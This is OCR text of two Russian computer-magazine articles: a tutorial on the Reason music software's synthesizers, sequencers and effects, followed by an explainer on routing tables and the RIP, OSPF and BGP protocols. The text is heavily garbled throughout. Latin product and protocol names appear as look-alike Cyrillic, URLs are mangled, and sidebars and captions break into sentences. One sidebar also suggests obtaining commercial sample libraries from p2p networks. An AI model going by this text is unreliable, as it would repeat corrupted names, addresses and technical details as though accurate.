осцилляторов, это не менее распространенный прием. 

Кроме того, в ЗиЬ Тгасіог'е, как, впрочем, и во многих дру- 
гих устройствах, предусмотрены области для настройки 
амплитудной и частотной огибающих сигнала при помощи 
четырех фейдеров от времени атаки до времени спада. 

Аналогично настраивается модуляционная огибающая. 

ЗиЬ (гасіог, как и МаІзЬогп — полифонический синтезатор, 
характеризуемый максимальным (99) числом одновремен- 
но играющих голосов, которое задается стрелками инди- 
катора роІурЬопу. Котати, в основу синтезатора Маізігогп 
положен гранулирующий метод синтеза, суть которого 
заключается в использовании готовых фрагментов звуко- 
записи вместо генераторов простейших волн в субтрак- 
тивном методе, а в остальном, у них много общего. К лю- 
бому из них ты можешь подключить матрицу по СѴ. 

[ІИе Маігіх Иав и] Секвенсор Маігіх представляет собой управляю- 
щее устройство. С его помощью можно составлять непродолжитель- 
ные музыкальные фразы без полифонии, циклически воспроизводи- 
мые управляемым устройством, например, самплером или синтезато- 
ром. Максимальная длина секвенции составляет 32 шага, то есть 2 
такта, если секвенция движется на нормальной скорости, и 1 шаг ра- 
вен 1/16 такта. Такие последовательности шагов называются паттер- 
нами, которые записываются по 8 в каждый из 4 банков. На каждом 
шаге паттерна матрица способна извлекать звук заданной высоты из 



I ЧТО ТАКОЕ ДИНАМИЧЕСКИЙ ДИАПАЗОН? I 

Пределы изменения уровня сигнала определяют его динами- 
ческий диапазон (ДД). ДД численно равен разности между 
максимальным и минимальным значением цифрового отсче- 
та, выражается в децибелах. Зачастую, минимальным явля- 
ется уровень тех или иных шумов сигнала, в том числе, 
квантования или собственных шумов устройства. ДД — одна 
из важнейших характеристик сигналов и звуковых систем. 
Так, например, производители недорогих звуковых карт обе- 
щают тебе ДД порядка 95 дБ, однако на практике он не пре- 
восходит 80. В Ризоне и других подобных программах суще- 
ствуют устройства, изменяющие ДД сигнала. Такие эффек- 
ты обычно призваны сжимать/лимитировать его, что при 
правильном использовании оказывает ощутимый положи- 
тельный эффект на звучании музыкальной партии или про- 
изведения в целом. 



управляемого устройства, по длительности равный продолжительнос- 
ти звучания одного шага, либо его половины. Есть и второй режим ра- 
боты секвенсора, где вертикальные столбики образуют кривую, кото- 
рая может служить законом изменения того или иного параметра уп- 
равляемого устройства. Для этого необходимо соединить проводом 
выход матрицы сигѵе СѴ о управляющим входом, например, с ІІИег 1 
гезопапсе на ЗиЬ Тгасіог. Если кликнуть правой кнопкой мыши на зиЬ 
Ігасіог и создать матрицу, она автоматически привяжется к нему, и не 
будет необходимости осуществлять коммутацию соединительных ка- 
белей на задней панели устройств. Однако коммутация произойдет 
способом по умолчанию, а различных ее комбинаций можно приду- 
мать отнюдь немало. Гоа-транс мелодии очень удобно делать в матри- 
це, даже не прибегая к помощи встроенного в секвенсор Неазоп'а пи- 
ано рола. А функция гапбогпіге делает это устройство просто незаме- 
нимым при создании модного хауса или минимал-техно. 

[эффекты. Трансформация] А сейчас почувствуй себя мегакру- 
тым, попробуй подключить матрицу к ЗиЬ Тгасіог'у и запрограммиро- 
вать в ней что-нибудь. Пропусти все это через серию изображенных 
на рисунке устройств — эффектов преобразования сигнала. Если все 
сделано правильно, играет неплохой, в рамках Реазоп'а, звук — позд- 
равляю! Устройство ипізоп не только раздваивает моно-сигнал, но и 
привносит в звучание эффект беіипе. Его квинтэссенция заключается 
в том, что на выходе помимо колебаний на основной частоте присут- 
ствуют в обе стороны расстроенные относительно нее частотные сос- 
тавляющие, звучащие как 4, 8 или 16 голосов, поющих в унисон. Вто- 
рой канал после ипізоп'а, помимо всего прочего, пропущен через 
рЬазег. Это устройство действует по принципу сложения основного 
сигнала, поступающего на вход с нулевой фазой, и второго сигнала, 
того же самого, только о периодически флуктуирующей начальной 
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матрица. Управляющее устройство 



фазой в заданном частотном диапазоне и о выбранной тобой же ско- 
ростью, которая, кстати, поддается синхронизации с основной ско- 
ростью трека при помощи соответствующей кнопки. Помимо такой 
вот, практически, внеземной жести, осуществляется процесс частот- 
ной модуляции звука с заданной глубиной. Очень красивый эффект, 
также является одним из наиболее популярных как в электронной, так 
и в живой музыке. 

Ну, а если хочешь делать настоящее асіб-рубилово, тебе придется 
воспользоваться ЗСНЕАМ 4 — это реальная жесть. Устройство пред- 
назначено для внесения разнообразных искажений в структуре звука, 
которое среди нескольких возможных алгоритмов содержит в себе 
эффект сіізіогбоп. Никому объяснять не надо, все и так знают, что это 
такое. Одни волосатые парни подключают к нему электрогитары, дру- 
гие пропускают через него драм-ритмы и аоісі-партии, чем займешься 
и ты, мой юный друг, если хочешь настоящего МЯСА. Устройство 
снабжено регулятором степени повреждения звука и двумя регулято- 
рами для настройки различных свойств каждого из видов искажений 
сигнала. Кроме всего этого и трехполооного частотного эквалайзера, 
зсгеат имеет встроенный блок под названием Ьосіу, работающий по 
известному некоторым людям алгоритму. Здесь можно управлять ре- 
зонансом, частотой, параметром «аиіо» и типом Ьобу — хз. Что это 
значит :)? Если интересно — советую пойти к гадалке о ноутбуком или 
написать письмо в РгореІІегбеасІ ЗоПѵѵаге. Кстати, зсгеат серьезно 
искажает панораму, однако все же можно использовать его в режиме 
(аре в качестве компрессора. При батаде равном 20 — 30 и отключен- 
ном блоке Ьобу ты можешь немного поднять уровень субъективного 
восприятия своего трека в целом, установив устройство на выходе 
микшера. Иногда бывает весьма полезно таким образом компресси- 
ровать весь микс целиком, особенно, если принимать во внимание 
низкое качество устройства СОМР-01 и процессоров для мастеринга. 
Чтобы услышатъ диалог общения двух пришельцев, создай после 
зсгеат в тракте ведущей партии две линии задержки ООЕ — по одной 
на каждый стереоканал. 

Осуществив коммутацию, позаботься о настройке линий так, чтобы не 
было каши в космических сигналах, так как это может помешать пар- 
ням понимать друг друга. Экспериментируй с матрицей и временами 
задержек в шагах или миллисекундах, крути ручки, добивайся легко- 



го и плотного саунда, насколько это позволя- 
ет ризон, сабтрактор, микшер и эффекты. 
Ведь ты способен сделать гораздо больше, 
чем только можешь представитъ. 

[не пора ли сделать бочку?] ВеОгит, 1е(з 
гоІІ (бе бгитз. Отличная вещь, представляет 
собой очень удобную ритм-станцию с подде- 
ржкой загрузки семплов и подключения 
внешних устройств. Да-да, самое время соз- 
дать НеОгит и загрузитъ в него несколько 
драм-семплов из рефилла, вроде гоЬо(з апб 
сотри(егз. Но этого, как всегда, мало. Чтобы 
бочка хорошо звучала в миксе, понадобятся 
все твои психические ресурсы. Кстати, ее 
можно получить и на сабтракторе, вытянув резонанс на самый макси- 
мум, и сместив частоту среза в область 55 — 75 Г ц. Выход сабтракто- 
ра подключается к микшеру или зрігіег аибіо, чтобы иметь общие эф- 
фекты с остальной партией ударных, если это необходимо, а от 
гебгит'а к сабтрактору протягивается провод, соединяющий гейт-аут 
и гейт-ин. Пример такого соединения смотри на рисунке. Кстати, мож- 
но использовать и матрицу, а при помощи сабтрактора синтезировать 
не только бочку, но и рабочий барабан, том, тарелочки и другие виды 
перкуссии. А можно просто грузить семплы. НеОгит имеет 10 ячеек 
для их загрузки или присоединения синтезаторов, однако тебе следу- 
ет помнить о том, что последний способ сильно оказывается на про- 
изводительности системы. Для каждой из ячеек существует возмож- 
ность установки таких параметров трансформации сигнала, как: глу- 
бина эффектов микшера 1 и 2, панорама, уровень, длительность, ме- 
тод среза, высота и тон. Благодаря этим параметрам ты можешь осу- 
ществлять тонкую настройку семпла в каждой ячейке. Ниже располо- 
жен встроенный секвенсор. Он имеет максимальную длину в четыре 
такта, то есть 4 раза по 16 позиций, на каждой из которых можно рас- 
полагать до десяти инструментов. Я рассказываю, как рубить транс, 
утверждаю, что бочка ударяет по сильным долям — 4 раза за такт. 
Остальное расставь, как тебе нравится. Паттерны, как и в матрице, 
сохранять в банки. Чтобы драм-партия стала пожирнее и давала 
драйв, сожми, как следует, ее динамический диапазон компрессором, 
встроенным в ЗСНЕАМ4 и подправь АЧХ при помощи эквалайзера. 
Хочешь еще — хорошо, пробуй использовать несколько бочек вместо 
одной, например 2. Не бойся экспериментировать, ведь в этом ключ к 
твоему успеху! 

[ну вот!] Теперь у тебя есть достаточно знаний, необходимых для созда- 
ния полноценного трека. Да, чуть не забыл! Я готов был лишить тебя само- 
го главного, ведь в секвенсоре Ризона, о котором я как раз собирался пи- 
сать, нет аудиодорожек. Это минус. Ну да ладно, у нас ведь есть еще один 
минус :). Всего два, а минус на минус, как известно, все же дают обещан- 
ный математический плюс. И это ММ-ХТ асіѵапсесі затріег. Вот такая вот 
железяка (смотри рисунок). Кстати, если ее развернуть, то там будет ЛСД- 
дисплей не меньше, чем у телевизора. Посмотришь дома. А на самом деле 
сюда можно грузить семплы, а потом играть на них, как на фортепиано. Су- 
ществует возможность 
загрузки/создания пат- 
то есть для каж- 
дой ноты можно исполь- 
зовать свой собственный 
семпл. Сколько клавиш 
у фортепиано — столь- 
ко семплов ты можешь 
сюда впихнуть, чтобы 
создать хороший патч. 

Если лень так сильно 
заморачи ваться, ноты 



I ПЛАСТМАССА И ЕСТЬ ПЛАСТМАССА I 

При всей красоте формы, безумной популярности, удобстве и дружелюбности интер- 
фейса, содержание оставляет желать лучшего. И это продолжается уже 5 лет :). Не 
хочу тебя расстраивать, но придется. Ризон делает плоский звук, правда его попу- 
лярности это мешает не особо. Можешь провести небольшой эксперимент. Загрузи в 
ВеОгит чистый синус. Воспроизведи его, и запиши при помощи программы, поддер- 
живающей анализатор спектра, например, СооІ ЕсІІІ или АбоЬе АисШіоп. Посмотри на 
спектрограмму, которая, вообще говоря, должна выглядеть вертикальной линией, и 
сам сделай необходимые выводы. 



I О СЕКВЕНСОРАХ И МЮІ I 

Создавать мелодии и автоматизацию 
можно непосредственно в секвенсоре, 
переключившись из режима аранжи- 
ровки в режим редактирования и выб- 
рав интересующий тебя инструмент 
из списка слева. А если подключить к 
Ризону миди-клавиатуру (МЮІ — циф- 
ровой интерфейс музыкальных 
инструментов), его возможности рас- 
ширятся примерно вдвое! Кстати, на 
большинстве современных миди-клав 
присутствует серия ручек-контролле- 
ров, которые можно сопоставлять ка- 
ким-либо регуляторам виртуальных 
устройств. Таким образом, ты мо- 
жешь крутить ручки и управлять авто- 
матизацией, наигрывать, записывать 
и редактировать партии, а функция 
циапііге поможет тебе выравнивать 
ноты по долям. 



[его ЭМ02 Об < 30 [08І ѲО ЦЭХѴХ] 
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Если ты всерьез решил за- 
няться музыкой, то тебе 
могут понадобиться раз- 
личные сэмплы и патчи. 
Библиотеки ВеЕІІІ, создава- 
емые специально для 
Яеазоп, ты можешь найти 
в популярных р2р-сетях 
или заказать себе диски. 



шшш.ртореііетбеаб.зе — 
официальный сайт 
РтореІІетРеаб ЗоЯтге. 
шшш.геазоптизіс.ги — 
ресурс рунета, посвящен- 
ный Яеазоп. 
шшш.етиіе-ртоіесі.пеі — 
популярный 2р2-клиент 
для сети Е02К. 
ѵлл/ѵ/.уа.ти — а здесь най- 
дется все остальное. 



можно группировать и 
использовать един- 
ственный семпл те- 
перь уже для группы 
клавиш. Для каждой 
такой клавиши предус- 
мотрена масса разно- 
образных настроек, 
на любой семпл мож- 
но накладывать мно- 
жество эффектов, ти- 
па ^РО, тобиіаііоп, 
епѵеіорез, ѵеіосііу, ріісб, 
(ІІІег, собственные наст- 
ройки семплов такие. 




субтрактивный синтез осуществляется здесь 




как: отступ 

от начала и конца, в том числе при 
образовании петли, гооі кеу, подстрой- 
ка высоты тона и другие. 8атр1ег — 
несомненно, нужная штуковина, 
кстати, таких в нашей стойке целых 
две, причем разных. Есть еще одна, 
более ранняя модификация самп- 
лера, под названием NN-19, сильно 
напоминающая аппаратную реали- 
зацию устройств АКАІ, которую 
мое драгоценное внимание обхо- 
дит почему-то стороной. Это был 
третий минус, ну а последний, чет- 
вертый — это Ог. Нех. Этот предс- 
тавляет собой ни что иное, как про- 
игрыватель петель — зацикленных 
файлов в формате ВЕХ 2. Такие 
можно взять либо в рефиллах, ли- 
бо получить при помощи специаль- 
ной программы под названием 
НеСусІе!, которая режет обычные 
ѵѵаѵе-файлы на куски (зіісез). А де- 
лает она это для того, чтобы можно было менять скорость композиции, 
при этом оставляя нетронутым значение пара- 
метра ріісіт. Грубо говоря, при незначительном 
ее изменении, нарезанный, к примеру, ритм 
продолжает звучать практически так же, как 
звучит записанный когда-то на микрофон. Но 
это только практически. Просто Ризону не зна- 
кома придуманная уже давным-давно одна 
фича под названием Ііте зігеісіі, которая из- 
меняет продолжительность звучания фрагмен- 
та при рі1сІі=сопз1. К счастью, теперь ты с ней 
знаком и понимаешь, что четвертый минус по- 
дошел к концу, а плюсов стало уже два. 



Внимание! Не стоит поль- 
зоваться протоколом 
ЯеѴѴІте на медленных ма- 
шинах. Ризон осущес- 
твляет синтез и преобра- 
зование сигналов в реаль- 
ном времени, а на это 
уходит немало системных 
ресурсов. 2 таких устрой- 
ства могут потреблять 
вдвое больше. 

Помни об этом. 



можно записывать все изменения состояния приборов в реальном време- 
ни. Для этого необходимо выставить значок «Европа» напротив того уст- 
ройства, автоматизация которого будет осуществляться в ближайшее вре- 
мя. Далее нажимается клавиша РІау. Теперь можно крутить ручки, нажи- 
мать, переключать, изменять параметры выбранного тобой устройства. Ав- 
томатизацию поддерживают большинство ручек и переключателей, но все 
же не все. Кстати, матрицей и сменой паттернов тоже можно управлять. 
Делай как тебе удобно, а, вообще, есть два пути. 

Второй заключается в том, что ты просто копируешь содержание пат- 
терна матрицы или драм-машины в пиано-ролл. Для этого необходи- 
мо выделить из описка внизу устройство, которое будет воспроизво- 
дить звук, и, нажав на матрицу правой кнопкой мыши, выбрать пункт 
сору раНегп Іо Ігаок. При этом содержание паттерна окопируетоя на 
желаемую дорожку в пределах, предварительно установленных тобой 
указателями Е и В. Указатель «Е» символизирует конец трека. Он ну- 
жен для того, чтобы программа знала длину ѵѵаѵе-файла, генерируе- 
мого при финальном рендеринге. 

[іі І8 оѵег] Такой вот получился рассказ, плохой или хороший — неважно, 
теперь он просто есть. А я все же надеюсь, что было интересно, и в процес- 
се чтения ты получил хоть сколько-нибудь удовольствия. Ризон остается 
ризоном, желаю ему успешных продаж и улучшения алгоритмов, а тебе, 
дорогой читатель, — нереального драйва без наркотиков, гармонии и счастья. 
Пиши музыку, жуй жвачку, пока © 



щи- 


.^4. □ : 




" $ 




« I 










н 


■о 1 








тз 






II 



« ^ # ч чл 

. Г . . Г. 






г 

в 



і I 



ііИ < (ічі Ні ыі I II і I ікі кіи ііі I II іііі I II 1 1 II I ■■■■ 



III 



"А"01 1 






ШМИШ1І 



[настало время поговорить о секвенсоре] 

Нет, не о матрице, а о секвенсоре в 
широком смысле слова. Именно в 
нем протекает процесс создания за- 
конченного трека от начала и до 
конца. Аналогичные вещи можно 
встретить в любой программе для 
сведения звука, будь то Неазоп или 
СиЬазе. Здесь формируется после- 
довательность команд, которая, 
воспроизводясь, указывает синте- 
заторам и другим девайсам, что за 
ноту сыграть или какую крутилку по- 
вернуть в данный момент. Послед- 
нее замечание и есть, собственно, 
автоматизация в Ризон. Это значит, 
что если нажать кнопку записи, то 



дорожки, секвенсор 
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I ИЗ моно в СТЕРЕО I 

ЗиЬ Тгасіог, в отличие от Маізігот'а, синтезирует моно звук, поэтому если есть желание получить стереозвук, необходимо развет- 
вить его при помощи устройства зрісіег аибіо, либо использовать такие эффекты, которые при моносигнале на входе имеют сте- 
реосигнал на выходе, например, ипізоп или геѵегЬ. Примеры подключения таких устройств показаны на рисунках «Ігапсеформи- 
руй» и «ОК, ггоІІ (ба бгитз». 
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Маршрутные 

заморочки 

ПРЕДСТАВЬ, ЧТО ТЕБЕ НУЖНО СОЕДИНИТЬСЯ 
С КАЛИФОРНИЙСКИМ СЕРВЕРОМ ПО РТР-ПРО- 
ТОКОЛУ. ТЫ ПРИКАЗЫВАЕШЬ КЛИЕНТУ ПРОИЗ- 
ВЕСТИ КОННЕКТ, НО ДАЖЕ НЕ ЗАДУМЫВАЕШЬ- 
СЯ, ПО КАКИМ ПУТЯМ ПРОХОДЯТ ТВОИ ПАКЕ- 
ТЫ. А МАРШРУТЫ У НИХ, НАДО СКАЗАТЬ, СА- 
МЫЕ ЗАГАДОЧНЫЕ И ТЕРНИСТЫЕ. НО НЕСМОТ- 
РЯ НА СЛОЖНОСТИ ПОИСКА НУЖНЫХ МАРШ- 
РУТОВ, ПАКЕТ ВСЕГДА ДОЙДЕТ ПО БЫСТРОМУ 
И КАЧЕСТВЕННОМУ КАНАЛУ. ЭТО ПРОИЗОЙДЕТ 
БЛАГОДАРЯ ЗАСЛУГАМ МАРШРУТНЫХ ПРОТО- 
КОЛОВ, О КОТОРЫХ МЫ СЕЙЧАС И ПОГОВО- 
РИМ. I Докучаев Дмитрий ака РогЬ (ЬгЬ@геа1.хакер.ги) 

Маршрутизация 
в глобальных сетях 




условная схема сети интернет 



тизация просто неприемлема в больших сетях, особенно, если узлы связа- 
ны резервными связями. Второй вид маршрутизации, получивший название 
«фиксированная», предполагает наличие так называемой таблицы маршру- 
тизации, которая существует в любой современной операционной системе. 
Каждая таблица должна иметь, как минимум, пять столбцов. Вот они: 

Ш Адрес сети — сеть или отдельный ІР-адрес, куда должен бьп-ь доставлен пакет. 
[Ц Маска сети — чтобы однозначно идентифицировать подсеть должна 
быть использована маска. 

Ш] Шлюз — на этот адрес будет передан пакет в случае совпадения адре- 
са назначения и адреса сети. 

0 Интерфейс (или номер порта) — инициализирует интерфейс, по которо- 
му будет проходить пакет. 

[Ц Метрика — определенное число, характеризующее канал связи. 



[грамотная классификация методов] Преж- 
де чем углубляться в теорию маршрутизации в 
глобальных сетях (а именно по таким сетям будет 
проходить пакет из России в Штаты), рассмотрим 
простую классификацию методов маршрутиза- 
ции. Способы доставки пакета в правильном нап- 
равлении принято делить на три больших класса. 

Ш Простая маршрутизация 
[Ц Фиксированная маршрутизация 
[И Адаптивная маршрутизация 

Поговорим о каждом классе немного подробнее. 
Простая маршрутизация работает по принципу уст- 
ройств канального уровня (повторители, коммутато- 
ры, мосты) и в наше время используется очень ред- 
ко. Тем не менее, о ней необходимо знать. Имеется 
три вида простой маршрутизации. Первый получил 
название «случайная маршрутизация». При этом 
каждый маршрутизатор, получив пакет, отправляет 
его на случайный интерфейс (может, и дойдет куда 
надо :)). Сам понимаешь, что такой подход не гаран- 
тирует быстрой и качественной доставки пакета ад- 
ресату. А в ряде случаев пакет вообще уничтожается 
при превышении ТТС Второй вид называется «ла- 
винная маршрутизация». В этом случае роутер шлет 
пакет по всем активным интерфейсам. Минус этого 
приема — засорение сети избыточной служебной ин- 
формацией. И наконец, третий вид — называется 
«маршрутизация по опыту». Применяя этот прием, 
шлюз изначально накапливает сведе- 
ния о маршрутах, пересылая данные, 
как правило, лавинным способом. За- 
тем, составляя некоторую таблицу, он 
учится направлять пакеты куда надо. 

Это очень напоминает работу моста, 
когда имеют место режимы обучения и 
работы. 

Как я уже сказал, простая маршру- 



Смысл фиксированной маршрутизации в том, что вся работа по прописыванию 
путей возлагается на администратора сети. Разумеется, что в случае простенькой 
локальной сети прописать все маршруты можно за пять минут. Но когда речь идет 
о глобальной сети с разными каналами, то здесь следует очень сильно подумать. 
К примеру, если в сети имеются резервные линии, то очень сложно переключить- 
ся на нее в случае аварии на основном канале. Впрочем, данный метод зареко- 
мендовал себя в небольших локальных сетях и на магистральных линиях. 

Еще одна маленькая особенность фиксированной маршрутизации: в слу- 
чае, когда нужно доставлять все или большинство пакетов на один узел, 
используется понятие «шлюз по умолчанию». Адрес сети и маска в этом 
случае будут иметь вид 0.0. 0.0. Когда совпадение адреса назначения с ад- 
ресом сети не происходит, данные уходят на дефолтовый шлюз. 

Третий вид маршрутизации, получивший название «адаптивная», — самый 
интересный. Только он применяется в больших сетях с разными каналами и 
избыточными линиями. Смысл адаптации в том, чтобы быстро поменять 
маршрут в случае выхода из строя отдельной линии, либо добавления ново- 
го шлюза. В данный момент используется два вида протокола маршрутиза- 
ции: НІР и ОЗРР. Мы обязательно поговорим о работе каждого из них, но 
сначала рассмотрим общий принцип передачи данных в глобальных сетях. 

[принцип работы глобальных сетей] Как ты знаешь, существуют так на- 
зываемые «операторы связи», которые содержат собственные каналы и аренду- 
ют провайдерам доступ к ним. Собственность каждого оператора, включая все 
локальные сети провайдеров, подключенные к нему, принято называть «автоном- 
ной системой». Автономная система — это ряд связанных между собой машин о 
единой внутренней политикой маршрутизации (ЮР — Іпіегпаі Ѳаіеѵѵау Ргоіосоі). 
Сами автономные системы посредством мощных каналов соединяются между 
собой, образуя единую сеть ІпІегпеТ Но, как ты понимаешь, невозможно передать 
данные каждому маршрутизатору обо всех остальных роутерах. Поэтому приня- 
то выделять так называемые «пограничные шлюзы» автономной системы. Все 
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типичные таблицы маршрутизации для ѴѴІпбоѵѵз и Сізсо 






На компакте ты найдешь 
несколько статей по сете- 
вым протоколам, а также 
учебник «Компьютерные 
сети» в электронном виде 
под редакцией В. Олифера, 
где находится описание всех 
глобальных протоколов. 

Подробнее прочитать про 
глобальные протоколы 
маршрутизации можно в 
электронной библиотеке 
ШрУ/аЛбепа.твиги/пеТ/Ьоок/ 




граф, построенный протоколом ОЗРР 



шлюзы соединяются по единой маги- 
страли и обмениваются данными 
посредством внешних протоколов 
маршрутизации (ЕѲР — Ехіегпаі 
Ѳаіеѵѵау Ргоіосоі). 

К внутренним протоколам, как я уже 
отметил, относятся РІР и ОЗРР. Есть 
и другие редкие методики, однако 
стандартизированными и популяр- 
ными являются эти две. Протокол 
РІІР (Роиііпд Іп(огта{іоп Ргоіосоі) 
очень прост и универсален, поэтому 
поддерживается всеми операцион- 
ными системами и железными 
маршрутизаторами. Он относится к 
классу «дистанционно-векторных» 
протоколов. Сейчас я расскажу о ра- 
боте РІР немного подробнее. 

[гезі Іп Реасе] Идея РІР очень 
проста. Каждый маршрутизатор 
через определенный интервал 
времени отсылает информацию о 
связях своим соседям. Сосед со- 
относит их со своей базой и до- 
бавляет данные, если они акту- 



альны. Таким образом, все роутеры должны знать обо всех своих сетях. 
Метрика в РІР совпадает о числом хопов до нужной сети. В случае, если 
метрика равна 16, сеть считается недоступной. Следовательно, протокол 
может работать с сетью, в которой максимально число шлюзов менее 16. 
Давай рассмотрим наглядный принцип работы протокола РІР на примере, 
и все станет понятно. Предположим, у нас имеется сеть из четырех маршру- 
тизаторов А, В, С и □ (смотри скриншот). Как только мы активировали прото- 
кол, либо подали питание на роутеры, начинается активное пополнение сво- 
их баз. Маршрутизатор А, к примеру, будучи соединенным со шлюзами В, С 
и с тупиковой сетью 1 , после включения разошлет следующую информацию: 

1 -> 1 

В -> 1 — маршрутизатору С 
и 

1 -> 1 

С -> 1 — маршрутизатору В. 

Получив эти данные, скажем, маршрутизатор С, начинает их обработку. 
Сперва он проверяет, чтобы метрика не превышала 16, затем ищет в сво- 
ей таблице роутинга сети назначения. При их отсутствии он внесет всю ин- 
формацию, но предварительно увеличит все метрики на единицу. Затем 
роутер С передаст следующие данные маршрутизатору □: 

1 -> 2 
В -> 2 
А-> 1 
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основные принципы работы протокола ВІР 



Но предположим, что роутер В уже передал эти сведения раньше. При этом у 
маршрутизатора О уже успела сформироваться точно такая же таблица. В этом 
случае табличные и полученные метрики окажутся одинаковыми. Тогда □ прос- 
то проигнорирует данные и не сохранит их в памяти. То же самое произошло, 
если бы □ получил метрики, превышающие собственные до той же сети. 

Через определенное время все роутеры будут знать обо всех сетях в общей 
автономной системе. После этого обмен данными будет происходить раз в 
30 секунд, но если сведения о сети не были получены в течение 180 секунд, 
то маршрутизатор установит метрику до сети равной 1 6, что будет говорить 
об ее недоступности. Таким образом, обнаруживаются отключения шлю- 
зов, либо аварии на каналах. 

Бывают случаи, когда происходят внештатные ситуации, получившие наз- 
вания «зацикливание» и «счет до бесконечности». Эти вредные явления 
засоряют сеть ложной информацией и могут длиться до получаса. Зацик- 
ливание происходит после отключения одной из сети, когда сторонний ро- 
утер оповестит соседа, что сеть доступна через него (в случае, если сосед 
не успеет оповестить маршрутизатор о недоступности сети). Таким обра- 
зом, между шлюзами образуется петля. 

Чтобы избежать петель, вводят два ограничения в протокол НІР. Первое на- 
зывается «правилом разделения горизонта». Оно гласит, что маршрутизатор 
А не должен отправлять данные о сети В, маршрутизатору С, если послед- 
ний ему сообщил о сети В. Иными словами, роутер не шлет инфу о сети со- 
седу, если изначально получил сведения об этой сети от него. Второе огра- 
ничение обязывает шлюз изменить метрику маршрута, если ее разослал тот 
же самый роутер. Отчасти, эти добавления спасают от петель, но не всегда. 
Бывает, что маршрутизатор получает ложные данные от стороннего шлюза 
по цепочке. Но мы не будем углубляться в такие сложности :). 

Счет до бесконечности происходит в результате несвоевременного опове- 
щения станций. При этом ложный маршрут может существовать, пока мет- 
рика сети не станет равной 16. Вот как это происходит. 

Предположим, что произошло внезапное отключение сети 1 . Маршрутиза- 
тор А, обнаруживая пропажу линка, рассылает шлюзам В и С вектор рас- 
стояния 1->16. До шлюза С эта информация дошла сразу, и он своевремен- 
но изменил маршрут (согласно второму ограничению). Однако до шлюза В 
эта инфа не дошла (произошла задержка). В это время шлюз В рассылает 
информацию роутеру С, гласящую о том, что сеть А доступна через него и 
имеет метрику 2. Маршрутизатор С принимает эту информацию, увеличи- 
вает метрику на единицу и рассылает данные дальше — шлюзу А. Допус- 
тим, в это время пакет к шлюзу В с вектором расстояния 1->16 все-таки до- 
шел. Но следом дошел и пакет с расстоянием 3 от того же шлюза А. В ито- 
ге вся эта инфа будет циркулировать по всем трем роутерам до тех пор, по- 
ка во всех таблицах не будет установлена метрика 16. Это явление и полу- 
чило название «счета до бесконечности». 

Борются с ним двумя способами: замораживанием изменений (когда на 
время шлюз, уловивший, что сеть отключена, не принимает сведения об 



I СУММИРОВАНИЕ МАРШРУТОВ I 

Существует интересный прием суммирования маршрутов с по- 
мощью более коротких масок, применимый во многих сетевых 
протоколах. К примеру, у нас имеется две сети, подключенные 
к одному маршрутизатору. Первая имеет адрес 192.168.1.0/25, 
а вторая — 192.168.1.128/25. Данные сети можно легко объе- 
динить в общую 192.168.1.0/24 и передать информацию о ней 
вышестоящему маршрутизатору. В итоге поиск маршрута бу- 
дет происходить быстрее, а трафика по каналам передаваться 
в два раза меньше. 

Если же имеются две сети, скажем, с маской /26, которые не пе- 
рекрывают друг друга полностью, то суммировать маршрут нель- 
зя. Возможен случай, когда остаточная подсеть находится совсем 
в другом месте, однако маршрутизатор не будет знать об этом. 
Стоит помнить, что РІРѵІ не понимает масок, поэтому суммирова- 
ние может применяться лишь в протоколах ВОР, ОЗРР и РІРѵ2. 



в 




демонстрация счета до бесконечности 



этой сети), либо триггерными обновлениями (в случае немедленной рас- 
сылки сведений о недоступности сети, независимо от текущего значения 
таймера). Однако даже эти методы не могут гарантировать отсутствие сче- 
та до бесконечности в НІР-системе. 

[08РР — лучший протокол для внутренней маршрутизации] На 

смену НІР пришел протокол 08РР, который снимает ограничение в 15 уз- 
лов и сводит к минимуму служебный трафик. Он относится к классу прото- 
колов «состояния связей», а его работа складывается в два этапа: 

Ш Каждый маршрутизатор после включения рассылает информацию по 
всем своим интерфейсам обо всех своих соседях, используя сообщения ти- 
па Біпк-Зіаіе. 

[Ц После составления полной сетевой картины роутер начинает искать оп- 
тимальный маршрут до каждой сети, используя специальный алгоритм 
Дийкстры (а еще Дийсктра, козел, придумал семафоры, которые мне 
пришлось сдавать по предмету ОС — Прим. Бублика). 

По истечению определенного времени соседи обмениваются друг с другом 
специальными сообщениями НЕББО, которые говорят о том, что сосед жив 
и здоров :). В случае, если роутер по какой-то причине отключился, марш- 
рутизатор немедленно рассылает обновленные данные о соседях, чтобы 
исключить мертвый шлюз. Все роутеры начинают перестраивать маршру- 
ты, которые проходили через отключенный маршрутизатор. Таким обра- 
зом, сетевая активность в протоколе ОЗРР практически нулевая и достига- 
ет пика только в стадии обмена связями. 

Думаю, понятно, что при частых отключениях канала пересчет маршрутов 
и обмен лишним трафиком будет весьма накладен даже в ОЗРР. Поэтому 
совсем необязательно использовать одну таблицу для всей автономной 
системы. В протоколе существует деление системы на отдельные зоны, 
для каждой из которой будет использован отдельный процесс ОЗРР. 

Что касается метрики, то здесь все намного удобнее, чем в РІІР. Метрика 
представляет собой уже не число хопов, а пропускную способность канала 
(время передачи одного бита в 10-наносекундных интервалах). Так, для 
Еіііегпеі метрика равна десяти, для Разі Еіітегпеі — единице, а для канала 
56 Кб/с — числу 1785. Полная метрика для определенного маршрута явля- 
ется суммой всех промежуточных каналов. При этом ОЗРР никогда не про- 
пустит пакет через диалапный канал в один хоп, если имеется связь, пост- 
роенная на Разі Еіітегпеі, пусть даже состоящая из 3 — 4 хопов. 

Следует отметить, что ОЗРР умеет посылать данные сразу по нескольким ка- 
налам, тем самым, уменьшая нагрузку на сеть. Однако в этом случае действу- 
ет ограничение по метрике. За подробностями обращайся в более разверну- 
тую теорию по ОЗРР, все особенности которой не поместятся в этой статье. 

[ВСР сближает системы] В заключение материала я расскажу о внеш- 
нем протоколе ВОР. На текущий момент этот ВОР зарелизен под четвертой 
версией и не имеет конкурентов. Принцип работы протокола очень прост: на 
граничных шлюзах автономной системы прописаны определенные правила, 
согласно которым маршрутизатор будет рассылать пакеты по своим интер- 
фейсам. Скажем, если администратор прописал правило на время суток, то 
днем данные будут отправляться по одному интерфейсу, а ночью по друго- 
му. Также можно классифицировать трафик по приоритету, качеству ин- 
формации и т.п. Все граничные шлюзы обязательно обмениваются между 
собой таблицами маршрутизации. Таким образом, к такому роутеру выдви- 
гаются довольно жесткие требования по дисковому пространству и произво- 
дительности. Однако с помощью механизма суммирования маршрутов мож- 
но существенно снизить размер передаваемой информации. 

[что выбрать? Решай сам!] Если ты заинтересован в выборе протоко- 
ла маршрутизации, то тебе необходимо взвесить все «за» и «против». 
С одной стороны, громоздкий ОЗРР может все и еще чуть-чуть, но опять- 
